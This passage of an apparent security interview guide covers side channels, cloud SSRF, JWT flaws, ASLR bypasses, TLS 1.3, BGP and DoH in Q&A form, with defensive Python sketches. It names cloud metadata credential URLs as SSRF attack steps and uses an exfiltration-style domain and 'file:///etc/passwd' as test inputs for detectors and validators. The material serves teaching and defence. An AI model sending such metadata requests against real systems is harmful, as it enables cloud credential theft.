Types: (1) Timing attacks: Measure execution time to infer secret values. Example: comparing password hash byte-by-byte — early mismatch returns faster, revealing correct bytes. Mitigation: constant-time comparison functions. (2) Cache attacks (Spectre/Meltdown): Exploit CPU speculative execution and cache timing to read kernel memory or cross-process data. Spectre (CVE-2017-5753): tricks speculative execution into accessing out-of-bounds memory, then measures cache timing to infer the value. Meltdown (CVE-2017-5754): reads kernel memory from userspace via speculative execution. Mitigations: KPTI (kernel page table isolation), retpoline, microcode updates, process isolation. (3) Power analysis: Monitor power consumption of cryptographic hardware to extract keys. Relevant for smartcards, HSMs. Mitigation: constant-power implementations, noise injection. (4) Electromagnetic emanation (TEMPEST): RF emissions from cables, screens can be intercepted and reconstructed. Mitigation: shielded cables, Faraday cages, TEMPEST-rated equipment. (5) Acoustic: Key extraction from the sound of computation (demonstrated by Genkin, Shamir, and Tromer, who extracted RSA keys from the acoustic emanations of laptops performing GnuPG decryptions).

Software mitigations: Constant-time code for all crypto operations. Don't branch on secret values. Don't use secret values as array indices. Use blinding (randomize intermediate values). Language-level support: hmac.compare_digest() in Python, crypto.timingSafeEqual() in Node.js.
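
The constant-time principle in code: both functions below return the same answers, but only the second examines every byte regardless of where the first mismatch falls. In practice, just call the stdlib's hmac.compare_digest:

```python
import hmac

def insecure_equal(a: bytes, b: bytes) -> bool:
    # Early-exit compare: runtime leaks the length of the matching
    # prefix, which an attacker can measure. For illustration only.
    if len(a) != len(b):
        return False
    for x, y in zip(a, b):
        if x != y:
            return False
    return True

def secure_equal(a: bytes, b: bytes) -> bool:
    # Accumulate the XOR of every byte pair; no data-dependent branch.
    if len(a) != len(b):
        return False
    diff = 0
    for x, y in zip(a, b):
        diff |= x ^ y
    return diff == 0

assert secure_equal(b"tag", b"tag") == hmac.compare_digest(b"tag", b"tag")
```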

Q17.3: What is SSRF in cloud environments and why is it particularly dangerous?

A: SSRF in cloud environments is more dangerous than in traditional infrastructure because cloud metadata services provide an unauthenticated HTTP API with powerful credentials.

Cloud metadata attack chain: (1) Find SSRF vulnerability in web application. (2) Request http://169.254.169.254/latest/meta-data/iam/security-credentials/[role-name] (AWS) or http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token (GCP). (3) Retrieve temporary IAM credentials (access key, secret key, session token). (4) Use credentials from attacker's machine to access cloud resources — S3 buckets, databases, other services — based on the role's permissions.

Why cloud makes it worse: Traditional SSRF might scan internal ports or access internal services. Cloud SSRF gives you IAM credentials that can access the entire cloud environment depending on role permissions. The blast radius extends far beyond the compromised instance.

Mitigations: IMDSv2 (AWS) requires a session token obtained via a PUT request, which simple SSRF can't perform; GCP requires the Metadata-Flavor: Google header; Azure IMDS requires the Metadata: true header and rejects proxied requests carrying X-Forwarded-For. Network-level blocking of the metadata IP from application subnets. Least-privilege IAM roles on instances. SSRF-specific input validation (block private IP ranges, link-local addresses).
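
The input-validation mitigation sketched with the standard library. On its own it is incomplete: hostnames must be resolved and the resolved IP re-checked (DNS rebinding), and redirects must be re-validated, which is why metadata-service hardening like IMDSv2 still matters:

```python
import ipaddress
from urllib.parse import urlparse

def is_blocked_target(url: str) -> bool:
    """True if the URL's host is a literal private, link-local,
    loopback, or reserved address. 169.254.169.254 is link-local,
    so the cloud metadata service is covered."""
    host = urlparse(url).hostname
    if host is None:
        return True   # unparseable: fail closed
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # hostname: resolve and re-check the resolved IP
    return ip.is_private or ip.is_link_local or ip.is_loopback or ip.is_reserved
```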

Q17.4: How do you approach securing a microservices architecture?

A: Microservices expand the attack surface — more services, more network communication, more credentials, more things to secure.

Service-to-service authentication: mTLS via service mesh (Istio, Linkerd) or application-level mTLS. Each service has its own identity (SPIFFE/SPIRE for workload identity). No shared secrets between services.

Authorization: Centralized policy engine (OPA) or per-service authorization. JWT tokens with scoped claims propagated through the call chain. Don't trust upstream services implicitly — verify authorization at each service.

Network: Default-deny network policies. Each service can only communicate with its declared dependencies. East-west traffic encrypted (mTLS). Egress controls — services can only reach approved external endpoints.

Data: Each service owns its data store — no shared databases. Data encrypted at rest with per-service keys. Audit logging of all data access.

API gateway: Central entry point for external traffic. Rate limiting, authentication, input validation, WAF integration. API versioning and deprecation.

Observability: Distributed tracing (Jaeger, Zipkin) for request flow visibility. Centralized logging with correlation IDs. Metrics for anomaly detection (unusual error rates, latency spikes, traffic patterns).

Supply chain: Container image scanning, base image standardization, dependency management per service, SBOM generation.


18. Behavioral and Leadership

Q18.1: You disagree with a VP who wants to ship a feature with a known critical vulnerability. What do you do?

A: (1) Quantify the risk: Don't say "this is insecure." Say "this vulnerability allows unauthenticated remote code execution. Based on our exposure and threat model, I estimate a 40% probability of exploitation within 90 days, with an impact of $X in incident response, regulatory fines, and customer trust." (2) Propose alternatives: "We can ship with these compensating controls (WAF rule, feature flag limiting exposure, enhanced monitoring) that reduce risk to acceptable levels while we fix the root cause in the next sprint." (3) Document the risk acceptance: If the VP accepts the risk, formalize it: documented risk acceptance with the VP's signature, timeline for remediation, compensating controls in place, and enhanced monitoring. (4) Escalate if necessary: If the risk is truly critical and the VP won't engage, escalate through the CISO or risk committee. Use the risk register. This is not going over someone's head — it's following the risk governance process. (5) Never block silently: Security is an enabler, not a blocker. Your job is to quantify risk and provide options, not to veto decisions.

Q18.2: How do you build a security culture in an engineering organization?

A: (1) Make security easy: Provide secure defaults (hardened base images, secure templates, pre-approved libraries). If the secure path is harder than the insecure path, developers will choose the insecure path. (2) Shift left, but don't dump: Integrate security tooling into developer workflow (IDE plugins, PR checks), but provide actionable guidance, not just alert spam. Fix the tooling when it produces false positives. (3) Security champions program: Train volunteer developers in each team as security liaisons. They handle local security reviews, triage SAST findings, and escalate to AppSec. (4) Blameless post-mortems: Focus on systemic fixes, not individual blame. "How do we prevent this class of bug?" not "who wrote this bad code?" (5) Gamification: Bug bounties (internal and external), CTF events, security training that's actually engaging. (6) Measure and share: Track metrics (time to remediate, vulnerability trends by team, security review coverage) and share them. Celebrate teams that improve. (7) Executive support: Security culture comes from the top. CISO needs a seat at the leadership table and visible executive sponsorship for security initiatives.

Q18.3: How do you prioritize a backlog of 500 security findings?

A: (1) Triage by exploitability and exposure: Internet-facing + actively exploited > internal + theoretical. Use EPSS (Exploit Prediction Scoring System) alongside CVSS. (2) Asset criticality: Vulnerability in payment processing system > vulnerability in internal wiki. Maintain an asset inventory with business criticality ratings. (3) Group by root cause: 50 XSS findings might be one missing output encoding library. Fix the root cause, close 50 findings. 200 findings might be one misconfigured Terraform module. (4) Apply SLAs: Critical (CVSS 9+, exploited in wild): 24-48 hours. High (CVSS 7-8.9): 7 days. Medium (CVSS 4-6.9): 30 days. Low: 90 days. (5) Communicate clearly: Provide developers with clear, actionable remediation guidance. Not "fix XSS" but "use DOMPurify.sanitize() on line 47 of comment.js before inserting into the DOM." (6) Track trends: Are findings decreasing over time? If not, invest in prevention (training, secure defaults, SAST) rather than just remediation.
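
Steps (1), (2), and (4) combined into a toy risk-ranking function. Field names and the exposure multiplier are illustrative; EPSS supplies the 0-1 exploitation probability, and real scores would come from your scanners and asset inventory:

```python
SLA_DAYS = {"critical": 2, "high": 7, "medium": 30, "low": 90}

def prioritize(findings):
    """Order findings by approximate real-world risk rather than raw
    CVSS: exploitation likelihood x exposure x asset criticality."""
    def risk(f):
        exposure = 2.0 if f["internet_facing"] else 1.0
        return f["epss"] * exposure * f["asset_criticality"] * f["cvss"]
    return sorted(findings, key=risk, reverse=True)
```

Note how a CVSS 9 finding on an internal wiki can rank below a CVSS 7.5 finding on an internet-facing payment system once likelihood and criticality are factored in.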


19. Emerging Threats and Advanced Concepts

Q19.1: What is the impact of quantum computing on cryptography?

A: What breaks: Shor's algorithm on a sufficiently large quantum computer breaks RSA, ECC, and Diffie-Hellman — all public-key cryptography based on integer factorization or discrete logarithm. This breaks TLS key exchange, digital signatures, PKI infrastructure.

What survives: Symmetric cryptography is weakened but not broken — Grover's algorithm provides quadratic speedup to brute force, so AES-128 effectively becomes AES-64 strength. AES-256 becomes AES-128 strength — still secure. Hash functions similarly reduced but remain viable at doubled output sizes.

Timeline: Cryptographically relevant quantum computers (CRQC) are estimated 10-20+ years away (as of 2026), but "harvest now, decrypt later" attacks mean sensitive data encrypted today could be decrypted in the future.

Post-quantum cryptography (PQC): NIST standardized PQC algorithms in 2024: ML-KEM (Kyber, lattice-based key encapsulation), ML-DSA (Dilithium, lattice-based digital signature), SLH-DSA (SPHINCS+, hash-based signature). Action now: (1) Inventory all cryptographic usage. (2) Identify systems handling data with long confidentiality requirements. (3) Begin hybrid deployments (classical + PQC). (4) Test PQC algorithm performance impact. (5) Plan PKI migration.

Q19.2: What is a confused deputy attack?

A: A confused deputy attack occurs when a trusted, privileged program is tricked into misusing its authority by a less-privileged attacker.

Classic example: A compiler with write access to system billing files. User specifies output file as the billing file. Compiler writes to it because it has permission — but the USER shouldn't have that permission. The compiler (deputy) is "confused" about whether it's acting on behalf of its own authority or the user's.

Modern examples: (1) SSRF: Web server (deputy) has network access to internal services. Attacker tricks it into making requests to internal endpoints the attacker can't reach directly. (2) IAM role assumption: Lambda function (deputy) with broad IAM permissions is triggered by user input. Attacker crafts input that causes the Lambda to access resources the attacker shouldn't reach. (3) Cross-account access in AWS: Service in Account A (deputy) has trust relationship allowing access to Account B resources. Attacker in Account A tricks the service into accessing Account B on attacker's behalf.

Mitigations: Capability-based security, explicit authorization delegation (AWS external IDs for cross-account roles), input validation on resource identifiers, principle of least privilege for deputy services.
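For the SSRF variant, input validation on resource identifiers means the deputy stops honoring attacker-chosen destinations. A minimal sketch of host allowlisting plus internal-address blocking (the allowlist entries are illustrative):

```python
import ipaddress
from urllib.parse import urlparse

# Illustrative allowlist: only these hosts may be fetched on a user's behalf.
ALLOWED_HOSTS = {"api.partner.example", "cdn.example.com"}

def is_safe_url(url: str) -> bool:
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False
    host = parsed.hostname or ""
    # Reject literal IPs in private/loopback/link-local ranges (blocks
    # 169.254.169.254 metadata-service tricks and internal pivoting).
    try:
        addr = ipaddress.ip_address(host)
        if not addr.is_global:
            return False
    except ValueError:
        pass  # not an IP literal; fall through to the allowlist check
    return host in ALLOWED_HOSTS

print(is_safe_url("https://api.partner.example/v1/report"))   # True
print(is_safe_url("http://169.254.169.254/latest/meta-data/"))  # False
print(is_safe_url("file:///etc/passwd"))                       # False
```

A production check would also resolve the hostname and validate (and pin) the resolved IP for the actual request, to defeat DNS rebinding.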


20. Practical Scenarios

Q20.1: Design the authentication system for a new banking application.

A: Authentication factors: (1) Password with Argon2id hashing (minimum 12 chars, check against breached password database — HaveIBeenPwned API k-anonymity model). (2) FIDO2/WebAuthn hardware key or platform authenticator as primary MFA (phishing-resistant). (3) TOTP as fallback MFA (Google Authenticator, Authy). (4) SMS as emergency recovery only (not primary MFA — SIM swapping risk).
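The k-anonymity breach check in factor (1) sends only the first five hex characters of the password's SHA-1; the server returns every suffix in that bucket and the match happens client-side, so the full hash never leaves the client. A sketch of the client-side hashing step (no network call shown; the HIBP range endpoint is the assumed backend):

```python
import hashlib

def hibp_range_query(password: str) -> tuple[str, str]:
    """Split the SHA-1 of a password into the 5-char prefix sent to the
    server and the 35-char suffix matched locally (k-anonymity model)."""
    digest = hashlib.sha1(password.encode()).hexdigest().upper()
    return digest[:5], digest[5:]

def is_breached(password: str, returned_suffixes: set[str]) -> bool:
    """Check the locally kept suffix against the suffixes the server
    returned for our prefix bucket."""
    _, suffix = hibp_range_query(password)
    return suffix in returned_suffixes

prefix, suffix = hibp_range_query("password123")
print(prefix, len(suffix))  # 5-char prefix, 35-char suffix
```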

Session management: Short-lived JWT access tokens (15 minutes). Refresh tokens with rotation (single use, stored server-side, invalidated on use). Session bound to device fingerprint and IP range. Re-authentication required for sensitive operations (transfers, payee changes) — step-up authentication.

Account security: Progressive lockout (exponential backoff, not hard lockout — a hard lockout lets an attacker DoS arbitrary accounts). CAPTCHA after 3 failed attempts. Alert on: new device, new location, impossible travel, failed MFA. Account recovery via identity verification (not security questions — they're guessable).
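The progressive-lockout policy above can be sketched as an exponential-backoff delay; the base delay and cap here are illustrative tuning knobs:

```python
def lockout_delay(failed_attempts: int, base: float = 1.0, cap: float = 900.0) -> float:
    """Delay (seconds) before the next login attempt is accepted.
    Doubles per failure, capped so the account is never hard-locked."""
    if failed_attempts <= 0:
        return 0.0
    return min(cap, base * 2 ** (failed_attempts - 1))

for n in (0, 1, 5, 20):
    print(n, lockout_delay(n))
# 1 failure -> 1s, 5 failures -> 16s, many failures -> capped at 900s
```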

Adaptive authentication: Risk engine evaluates: device posture, location, time, behavioral biometrics, transaction patterns. Low risk: no MFA challenge. Medium risk: MFA prompt. High risk: step-up authentication + transaction limit reduction. Critical risk: block and alert.

Infrastructure: Secrets in HSM (signing keys for JWTs). Rate limiting per user and per IP. Centralized authentication service (not implemented per-microservice). Audit logging of all authentication events with retention.

Q20.2: Your SIEM alert shows a spike in DNS queries to a single domain from 15 different internal hosts. Walk through your investigation.

A: Minute 0-5 (triage): (1) What domain? Check threat intel — known C2? DGA-generated? Recently registered? (2) What hosts? Workstations or servers? Same department/subnet? (3) When did it start? Sudden spike or gradual increase? (4) Query types? A records, TXT records (data exfiltration indicator), CNAME?

Minute 5-15 (scoping): (5) Pull full DNS logs for the domain — total volume, query patterns, subdomain entropy (high entropy = possible DNS tunneling/exfiltration). (6) Check proxy logs — are the same hosts also making HTTP/HTTPS connections to related domains? (7) Check EDR telemetry on affected hosts — what process is generating the DNS queries? Is it a known application or suspicious process? (8) Check if the domain resolves to known-bad infrastructure (IP reputation, ASN, hosting provider).
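The subdomain-entropy check in step (5) can be sketched with Shannon entropy: tunneled or exfil labels (base32/hex blobs) score well above human-chosen names. The 3.5-bit threshold and 20-char length gate are illustrative starting points, not calibrated cutoffs:

```python
import math
from collections import Counter

def shannon_entropy(label: str) -> float:
    """Bits of entropy per character of a DNS label."""
    if not label:
        return 0.0
    counts = Counter(label)
    total = len(label)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

def looks_like_tunneling(fqdn: str, threshold: float = 3.5) -> bool:
    # Score the leftmost label: that's where tunnels encode data.
    label = fqdn.split(".")[0]
    return len(label) > 20 and shannon_entropy(label) > threshold

print(looks_like_tunneling("www.example.com"))  # False
print(looks_like_tunneling(
    "nbswy3dpeb3w64tmmqxgg2lom5zs4y3pnuqhi33o.evil.example"))  # True
```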

Minute 15-30 (determination): If malicious indicators: (9) Contain the affected hosts (network isolation). (10) Memory dump of representative host. (11) Block the domain at DNS resolver and firewall. (12) Full EDR investigation — identify the process, its parent, when it was installed, how it got there (email attachment? drive-by download? lateral movement?). (13) Check all 15 hosts for common indicators — same malware hash, same persistence mechanism, same initial access vector.

If benign: (14) Document the false positive. (15) Tune the alert rule (add exception for the domain if legitimate, adjust threshold).

Post-analysis: (16) If malware: determine patient zero, full scope assessment, eradicate across all affected hosts, block all associated IOCs, update detection rules. (17) Report to stakeholders.

Q20.3: You're asked to assess the security of a third-party SaaS vendor that will handle customer PII. What do you evaluate?

A: Documentation review: (1) SOC 2 Type II report (most recent, review the Type I vs Type II distinction — Type II tests over time, Type I is point-in-time). Read the exceptions and management responses. (2) Penetration test report (third-party, recent, scope covers your use case). (3) Privacy policy and data processing agreement (DPA). (4) Incident response plan and breach notification commitment.

Technical assessment: (5) Data encryption at rest and in transit (algorithms, key management — do they use an HSM?). (6) Authentication model — do they support SSO/SAML/OIDC integration with your IdP? (7) Access controls — can you enforce RBAC? Is there audit logging? Can you review access logs? (8) Data isolation — multi-tenant architecture review. How is your data separated from other customers? (9) API security — authentication, rate limiting, input validation. (10) Data residency — where is data stored? Can you control geographic location?

Operational assessment: (11) Vulnerability management program — patching SLAs, scanning frequency. (12) Employee security — background checks, security training, access provisioning/deprovisioning. (13) Subprocessors — who else handles the data? (14) Business continuity — RTO/RPO, backup strategy, disaster recovery testing. (15) Right to audit — can you or a third party audit their environment?

Contractual requirements: (16) Data deletion on contract termination. (17) Breach notification timeline (align with your regulatory requirements). (18) Liability and indemnification. (19) Insurance coverage. (20) SLA with security-relevant metrics.


21. Cryptographic Protocol Analysis

Q21.1: Walk through the TLS 1.3 handshake in detail.

A: TLS 1.3 achieves 1-RTT handshake (vs 2-RTT in TLS 1.2):

ClientHello: Client sends: supported cipher suites (only AEAD: AES-128-GCM, AES-256-GCM, ChaCha20-Poly1305), supported groups (X25519, P-256), key_share extension (client's ECDHE public key — speculative, reducing round trips), supported_versions (TLS 1.3), signature_algorithms, PSK for 0-RTT resumption (optional).

ServerHello: Server sends: chosen cipher suite, chosen group, server's key_share (ECDHE public key). From this point, both sides can compute the shared secret and derive handshake keys.

Encrypted extensions: (encrypted with handshake keys) Server sends additional parameters: ALPN negotiation, server name acknowledgment.

Certificate: Server's certificate chain.

CertificateVerify: Server signs a transcript hash of the handshake with its private key — proves possession of the private key corresponding to the certificate. This replaces the static RSA key exchange.

Finished (server): An HMAC over the handshake transcript, providing integrity of the handshake and key confirmation.

Client Finished: Client sends Finished message. Both sides derive application traffic keys from the handshake.

Key improvements over TLS 1.2: Removed RSA key exchange (mandates PFS), removed CBC cipher suites (prevents padding oracle attacks), removed renegotiation, removed compression (prevents CRIME attack), 1-RTT (faster), 0-RTT resumption available (with replay protection caveats), simplified cipher suite negotiation (only 5 suites vs hundreds).
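The traffic keys in the handshake above come from the RFC 8446 key schedule, whose building block is HKDF-Expand-Label. A minimal sketch of that construction with SHA-256 (the secret and derived lengths below are illustrative, not a full key schedule):

```python
import hashlib
import hmac

def hkdf_expand(prk: bytes, info: bytes, length: int) -> bytes:
    """HKDF-Expand (RFC 5869) with SHA-256."""
    okm, t, counter = b"", b"", 1
    while len(okm) < length:
        t = hmac.new(prk, t + info + bytes([counter]), hashlib.sha256).digest()
        okm += t
        counter += 1
    return okm[:length]

def hkdf_expand_label(secret: bytes, label: str, context: bytes, length: int) -> bytes:
    """HKDF-Expand-Label (RFC 8446 section 7.1): the label is prefixed
    with "tls13 " and packed with the output length and context."""
    full_label = b"tls13 " + label.encode()
    info = (
        length.to_bytes(2, "big")
        + len(full_label).to_bytes(1, "big") + full_label
        + len(context).to_bytes(1, "big") + context
    )
    return hkdf_expand(secret, info, length)

# Illustrative: derive an AES-128-GCM key and IV from a handshake secret.
secret = hashlib.sha256(b"example handshake secret").digest()
key = hkdf_expand_label(secret, "key", b"", 16)
iv = hkdf_expand_label(secret, "iv", b"", 12)
print(len(key), len(iv))  # 16 12
```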

Q21.2: What are the security implications of JWT?

A: JWT structure: Header.Payload.Signature (Base64URL encoded). The payload is NOT encrypted — it's just encoded. Anyone can read JWT claims.

Common vulnerabilities: (1) Algorithm attacks (e.g., CVE-2015-9235 in node-jsonwebtoken): alg: none disables signature verification; alg confusion uses HS256 with the RSA public key as the HMAC secret — if the server accepts both RSA and HMAC, the attacker signs with the public key (which is public) using HMAC. Mitigation: hardcode the expected algorithm server-side; never trust the JWT's alg header. (2) Missing validation: Not checking exp (expiration), iss (issuer), aud (audience). (3) Insecure key storage: HMAC secret too short or hardcoded. (4) Sensitive data in payload: PII, permissions in unencrypted JWT. Use JWE if payload must be confidential. (5) No revocation mechanism: JWTs are valid until expiration. Mitigation: short-lived tokens (5-15 minutes) + refresh token rotation, or token blacklist (defeats the stateless benefit).
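The algorithm-pinning mitigation can be sketched by verifying HS256 tokens against a hardcoded algorithm, ignoring whatever the token's own header claims (minimal stdlib sketch; a real service would also validate exp/iss/aud):

```python
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")

def b64url_decode(data: str) -> bytes:
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))

def sign_hs256(payload: dict, key: bytes) -> str:
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url(json.dumps(payload).encode())
    sig = hmac.new(key, header + b"." + body, hashlib.sha256).digest()
    return b".".join([header, body, b64url(sig)]).decode()

def verify_hs256(token: str, key: bytes) -> dict:
    """Verify with a PINNED algorithm: the token's alg header is never
    consulted, so alg:none and RSA->HMAC confusion are moot."""
    header, body, sig = token.split(".")
    expected = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(b64url_decode(sig), expected):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(body))

key = b"demo-secret-at-least-32-bytes-long!!"
token = sign_hs256({"sub": "alice"}, key)
print(verify_hs256(token, key))  # {'sub': 'alice'}
```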

Best practices: (1) Use asymmetric signing (RS256 or EdDSA) for distributed verification. (2) Short expiration (5-15 minutes). (3) Validate all claims (exp, iss, aud, nbf). (4) Rotate signing keys periodically. (5) Don't store sensitive data in claims. (6) Use kid header to support key rotation. (7) Bind tokens to client (DPoP — Demonstrating Proof-of-Possession).


22. Operating Systems and Exploitation

Q22.1: What is ASLR and how can it be bypassed?

A: Address Space Layout Randomization randomizes the memory addresses of stack, heap, libraries, and executable base on each execution. Prevents attackers from predicting where code/data resides in memory, breaking hardcoded ROP gadget addresses and shellcode jumps.

Bypass techniques: (1) Information leak: Memory disclosure vulnerability reveals a single address — attacker calculates base address of the module and adjusts all gadget offsets. Single leak defeats ASLR entirely. (2) Brute force: On 32-bit systems, entropy is low enough (~16 bits for stack) to brute-force. 64-bit ASLR has much higher entropy (28+ bits). (3) Return-to-PLT: PLT (Procedure Linkage Table) entries may be at known offsets even with ASLR if PIE (Position Independent Executable) is not enabled. (4) Partial overwrite: Overwrite only the lower bytes of a return address (which don't change due to page alignment). (5) JIT spray: JavaScript JIT compilers place attacker-influenced constants at predictable locations. (6) Non-ASLR modules: If any loaded module doesn't use ASLR, its addresses are fixed — use gadgets from that module.

Defense: Enable ASLR system-wide + compile all binaries as PIE + high entropy ASLR (on Linux: randomize_va_space=2) + stack canaries + DEP/NX + CFI (Control Flow Integrity).

Q22.2: What is the difference between SELinux and AppArmor?

A: Both are Linux Mandatory Access Control (MAC) systems implemented as Linux Security Modules (LSM).

SELinux (Label-based): Every process, file, socket, and port gets a security label (context): user:role:type:level. Policy defines which types can access which types (type enforcement). Default-deny — if no rule allows it, it's denied. Extremely granular but complex. Used by: RHEL, Fedora, CentOS, Android. Developed by NSA.

AppArmor (Path-based): Profiles define what files (by path), network access, and capabilities a program can access. Per-program profiles rather than system-wide labeling. Easier to write and understand. Can run in complain mode (log violations without enforcing) for profiling. Used by: Ubuntu, SUSE, Debian.

Key differences: SELinux labels persist with the file (in extended attributes) — works across renames/moves. AppArmor uses paths — renaming a file changes whether a rule applies. SELinux is more comprehensive (covers IPC, networking, sockets at granular level). AppArmor is easier to adopt (profile individual applications without system-wide policy).

When to use: SELinux for high-security environments requiring comprehensive MAC (government, financial). AppArmor for containerized workloads, application sandboxing, and environments where operational simplicity matters. Both dramatically reduce the impact of application compromise.


23. Security Automation and DevSecOps

Q23.1: How do you implement security guardrails that don't slow down developers?

A: The goal is to make the secure path the easy path:

(1) Pre-commit: Secrets scanning (trufflehog, gitleaks) — blocks credential commits instantly. Fast, prevents the most embarrassing class of vulnerability.
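A pre-commit secrets check boils down to pattern matching on the staged diff. A toy sketch of the pattern side (two illustrative patterns; real scanners like gitleaks ship hundreds plus entropy heuristics):

```python
import re

# Illustrative high-confidence patterns (real scanners ship many more).
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
}

def find_secrets(text: str) -> list[tuple[str, str]]:
    """Return (pattern_name, match) pairs found in a diff or file blob."""
    hits = []
    for name, pattern in SECRET_PATTERNS.items():
        for match in pattern.findall(text):
            hits.append((name, match))
    return hits

diff = 'aws_key = "AKIAIOSFODNN7EXAMPLE"\nprint("hello")\n'
print(find_secrets(diff))  # [('aws_access_key_id', 'AKIAIOSFODNN7EXAMPLE')]
```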

(2) CI pipeline (fast feedback): SAST with tuned rules (Semgrep) — runs in <2 minutes, only high-confidence rules, inline comments on the PR. SCA (dependency check) — flags known-vulnerable dependencies with upgrade path.

(3) PR review automation: Auto-assign security reviewer for changes to auth, crypto, IAM, or infrastructure code (via CODEOWNERS). Bot comments with security checklist for sensitive file patterns.

(4) Deployment gates: Container image scanning — block deployment of images with Critical/High CVEs. IaC scanning (Checkov) — block deployments that violate security policies (public S3, unencrypted databases).

(5) Golden paths: Provide approved templates, modules, and libraries that are secure by default. Internal CLI tools that scaffold new services with security controls baked in. Secure base container images maintained by the platform team.

(6) Self-service: Security tooling dashboard where developers can see their own findings, understand them, and track remediation. Don't make developers open tickets to get security feedback.

Key principle: Shift left means moving actionable feedback earlier, not dumping raw scanner output on developers. Every automated finding must be actionable, have clear remediation guidance, and have a low false-positive rate. One false positive in a PR check costs more developer trust than ten true positives gain.


24. Network Protocols Deep Dive

Q24.1: How does BGP work and what are the security risks?

A: BGP (Border Gateway Protocol) is the routing protocol of the internet. Autonomous Systems (ASes) announce IP prefix ownership to peers. Routers build routing tables from BGP announcements and select best paths based on AS path length, policy, and preferences.

Security risks: (1) BGP hijacking: Any AS can announce any IP prefix. If accepted by peers, traffic destined for that prefix routes to the hijacker. No authentication in BGP — announcements are trusted by default. Examples: Pakistan Telecom hijacking YouTube (2008), China Telecom route leaks. (2) Route leaks: AS accidentally announces routes it received from one peer to another peer, becoming a transit when it shouldn't be. Causes traffic detours through unintended paths. (3) Path manipulation: Attacker prepends or manipulates AS path to influence routing decisions.

Mitigations: (1) RPKI (Resource Public Key Infrastructure): Cryptographically signs Route Origin Authorizations (ROAs) — validates that the announcing AS is authorized to originate the prefix. (2) BGPsec: Extends RPKI to validate the entire AS path (not just origin). Limited deployment. (3) IRR (Internet Routing Registry) filtering: Peers filter announcements against registered routes. (4) Route filtering best practices: Max prefix limits, bogon filtering, prefix length filtering (/24 minimum for IPv4). (5) BGP monitoring: RIPE RIS, RouteViews, BGPStream for real-time hijack detection.
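RPKI origin validation in mitigation (1) reduces to a simple check: the announced prefix must be covered by a ROA whose ASN matches and whose prefix length does not exceed the ROA's maxLength. A sketch using RFC 6811 valid/invalid/not-found semantics (the ROA data is illustrative):

```python
import ipaddress

# Illustrative ROAs: (prefix, max_length, authorized_origin_asn)
ROAS = [
    (ipaddress.ip_network("203.0.113.0/24"), 24, 64500),
    (ipaddress.ip_network("198.51.100.0/22"), 24, 64501),
]

def rpki_validate(prefix: str, origin_asn: int) -> str:
    """Return 'valid', 'invalid', or 'not-found' for an announcement."""
    announced = ipaddress.ip_network(prefix)
    covered = False
    for roa_prefix, max_len, asn in ROAS:
        if announced.subnet_of(roa_prefix):
            covered = True
            if asn == origin_asn and announced.prefixlen <= max_len:
                return "valid"
    # Covered by a ROA but wrong origin or too-specific prefix -> invalid.
    return "invalid" if covered else "not-found"

print(rpki_validate("203.0.113.0/24", 64500))  # valid
print(rpki_validate("203.0.113.0/24", 64666))  # invalid (wrong origin: hijack)
print(rpki_validate("192.0.2.0/24", 64500))    # not-found (no covering ROA)
```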

Q24.2: What is DNS over HTTPS (DoH) and what are the security implications?

A: DoH encrypts DNS queries inside HTTPS (port 443), making them indistinguishable from regular web traffic.

Security benefits: (1) Prevents DNS eavesdropping by ISPs, network operators, and on-path attackers. (2) Prevents DNS manipulation and censorship. (3) Provides integrity verification of DNS responses.

Security concerns for defenders: (1) Bypasses DNS-based security controls: Enterprise DNS filtering, DNS sinkholing, and DNS-based threat detection are all bypassed if clients use external DoH resolvers (Cloudflare, Google). (2) Malware using DoH for C2: DNS-based C2 detection relies on inspecting DNS traffic — DoH makes this invisible. (3) Visibility loss: Security teams lose DNS query logs, a critical data source for threat hunting and incident response. (4) Exfiltration channel: DNS exfiltration via DoH is harder to detect — it looks like normal HTTPS traffic.

Enterprise response: (1) Deploy internal DoH resolver — provides encryption while maintaining visibility. (2) Block external DoH providers at the firewall (known IPs) and via DNS canary domain checks. (3) Group Policy / MDM to configure managed devices to use enterprise DNS. (4) TLS inspection for DoH traffic (controversial — breaks privacy guarantees). (5) Detect DoH usage through SNI inspection or JA3/JA4 fingerprinting of known DoH resolver TLS connections.
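Detection item (5) can be sketched as matching observed TLS SNI values against known public DoH resolver hostnames. The list here is a small illustrative subset; in production this would be a maintained feed, supplemented by JA3/JA4 fingerprinting for clients that omit or fake SNI:

```python
# Illustrative subset of well-known public DoH resolver hostnames.
KNOWN_DOH_SNI = {
    "cloudflare-dns.com",
    "dns.google",
    "dns.quad9.net",
}

def flag_doh_connections(tls_events: list[dict]) -> list[dict]:
    """Flag TLS sessions whose SNI matches a known DoH resolver.
    On a network where managed clients must use the internal resolver,
    each hit is a policy violation worth investigating."""
    return [e for e in tls_events if e.get("sni", "").lower() in KNOWN_DOH_SNI]

events = [
    {"src": "10.0.4.17", "sni": "dns.google", "dst_port": 443},
    {"src": "10.0.4.21", "sni": "www.example.com", "dst_port": 443},
]
print(flag_doh_connections(events))  # flags only the dns.google session
```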


Summary

This document covers 120+ topics across the full spectrum expected at principal-level security engineering interviews. Key areas:

  • Network security: OSI model, TCP/IP, DNS, ARP, routing, IDS/IPS
  • Cryptography: Symmetric/asymmetric, KDFs, PKI, TLS 1.3, PFS, HMAC, block cipher modes
  • Application security: OWASP Top 10, XSS, CSRF, SSRF, SQLi, deserialization, code review, SAST/DAST
  • Cloud security: Shared responsibility, IAM, network isolation, IMDS, key management
  • Identity: OAuth/OIDC, SAML, Kerberos, RBAC/ABAC, Zero Trust
  • Incident response: NIST lifecycle, evidence volatility, chain of custody, blast radius, legal/regulatory
  • Architecture: Defense in depth, blast radius containment, multi-tenant security, threat modeling, CI/CD security
  • Risk management: FAIR model, CVSS, risk registers, executive communication
  • Detection engineering: TTP-based detection, Sigma rules, alert fatigue, SOC operations
